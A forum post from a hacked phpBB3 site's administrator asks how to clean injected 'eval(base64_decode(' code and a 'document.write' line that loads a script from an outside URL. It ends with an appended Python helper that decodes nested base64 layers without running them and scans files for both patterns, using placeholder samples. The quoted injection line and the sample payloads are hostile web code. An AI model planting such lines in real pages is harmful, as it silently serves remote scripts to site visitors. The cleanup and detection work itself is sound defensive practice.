Hi,
Our site has been hacked using "eval(base64_decode(" and "<script src=". We use phpbb3 with some modifications to it, but that's about it (there are some archives and html files, but nothing else). I've deleted everything and I'll be re-installing phpbb3 sans any mods. I've deleted all our ftp accounts and database passwords.
Still, I have some questions:
-Our site is contributed by one of our users and he has others sharing his site as well. He believes it's just us, which it very well might be, but is there anything I should know to look out for in regards to this? I'd really rather not have to ask our supplier to change the passwords for everyone who uses his space.
-I tried to read the "raw access logs". Not that I'd really know what to do with that info (some things did look suspicious to me though), but I figured it might be of some help.
EDIT: I've since checked the archive logs checkbox.
-As someone suggested, I'd like to disable the ability for eval to run at all on our site as it doesn't look like phpbb3 uses it at all so why let it run for a hacker. Can I do that from cPanel or something or do I have to ask hostmonster to do that? If I can do it, how do I do it? via the PHP config somehow?
EDIT: I figured out that you can easily do it by editing the php.ini file in your root folder with adding eval to the disable_functions directive. This page says Apache needs to be restarted though and I don't know if I need to do that somehow or it will do it on its own.
-One example of the code reads:
Code:
<?php eval(base64_decode('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')); ?>
Reading up on this I found out I can decode this to see where (backdoor?) files have been left, but when I try to decode it I just find more php code and another link to the site the "script src=" code links to. Could someone please show me how others find these file locations for other people having this problem?
-If I could, I'd much rather just clean our forum files as best as I can (using a text editor I can easily and quickly do this replacing the offending code with nothing), but I'm a bit worried I've missed something that includes something other than "eval(base64_decode(" and "<script src=". If someone has experience with this attack, is there anything else I should look for? With the eval thing I am also talking about the new gifimg.php files and with script src I'm also talking about the "document.write('<script src=http://kanto.ac.jp/course/VIVID.php ><\/script>');" in the .js files.
-Is this definitely coming through our forum somehow or could it very likely be coming in another way, maybe from someone else sharing the space (we do have separate directories) or maybe someone's computer got compromised and their password info was stolen? Or does this eval stuff necessarily mean it was some kind of XSS attack?
-I've read that directory permissions should be no higher than 755, but I've read [http://www.phpbb.com/kb/article/phpb...-permissions/] that some folders for phpbb need to be 777. Is this a problem or no? I've read that disabling the uploading of avatars is an option, but what about the other folders?
-Our root .htaccess reads:
Code:
RewriteEngine on
AddHandler application/x-httpd-php5 .inc
RewriteCond %{HTTP_HOST} ^[domain_snipped]$ [OR]
RewriteCond %{HTTP_HOST} ^[domain_snipped]$
RewriteRule ^/?$ "http\:\/\/[domain_snipped]\/portal\.php" [R=301,L]
which as far as I can tell is just telling it to redirect to the portal like I asked it to from cPanel. Is it okay?
-Is there anything else I haven't mentioned that I should be looking into?
Unfortunately our site is a little community that greatly depends on forum activity and even though we've been going strong for over 7 years we've had a fair amount of turnover recently, so I'm afraid this attack is really going to hurt us especially with all our newcomers if I don't get this hole plugged fast and for good.
I'll truly appreciate any help. Thank you.
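An added triage helper for two of the questions in the post (how others peel the nested eval(base64_decode()) layers to find the dropped file paths and remote URLs, and how to flag both injection patterns across a file tree). This is example code, not from the original post or from phpBB; the two-layer payload, the `images/gifimg.php` path and the `malicious.example` domain are constructed placeholders, and nothing decoded is ever executed.

```python
import base64
import binascii
import re

# Static patterns for the two injections described in the post.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
SCRIPT_SRC = re.compile(r"<script\s+src=[\"']?(https?://[^\s\"'>]+)", re.I)
URL = re.compile(r"https?://[^\s'\"<>\\]+")
FILE_REF = re.compile(r"['\"]([\w./-]+\.(?:php|js))['\"]")

def unwrap_eval_base64(src, max_depth=10):
    """Decode nested eval(base64_decode('...')) wrappers layer by layer,
    outermost first, without executing anything. Stops at bad base64."""
    layers = []
    for _ in range(max_depth):
        m = EVAL_B64.search(src)
        if not m:
            break
        try:
            src = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            break
        layers.append(src)
    return layers

def indicators(text):
    """URLs and .php/.js file references in a decoded layer: the places to
    check on disk (backdoor files) and to block at the proxy/firewall."""
    return sorted(set(URL.findall(text))), sorted(set(FILE_REF.findall(text)))

def scan_file_text(path, text):
    """Return (path, pattern) findings for the eval and <script src= injections."""
    findings = []
    if EVAL_B64.search(text):
        findings.append((path, "eval(base64_decode("))
    for url in SCRIPT_SRC.findall(text):
        findings.append((path, "script src=" + url))
    return findings

def _b64(s):
    return base64.b64encode(s.encode()).decode()

# Constructed sample, not the real payload: two eval layers whose innermost code
# loads a dropped backdoor file, plus one injected document.write line from a .js file.
INNER = "<?php include('images/gifimg.php'); ?>"
SAMPLE_PHP = "<?php eval(base64_decode('%s')); ?>" % _b64(
    "<?php eval(base64_decode('%s')); ?>" % _b64(INNER))
SAMPLE_JS = "document.write('<script src=http://malicious.example/VIVID.php ><\\/script>');"

if __name__ == "__main__":
    for depth, layer in enumerate(unwrap_eval_base64(SAMPLE_PHP), 1):
        print("layer %d: %s\n  indicators: %s" % (depth, layer, indicators(layer)))
    print(scan_file_text("viewtopic.php", SAMPLE_PHP) + scan_file_text("forum.js", SAMPLE_JS))
```

Run `scan_file_text` over every .php, .js, .inc and .htaccess file in the account (os.walk) and diff the flagged list against a clean phpBB3 download; the decoded file paths tell you which extra files (like the gifimg.php ones) to delete.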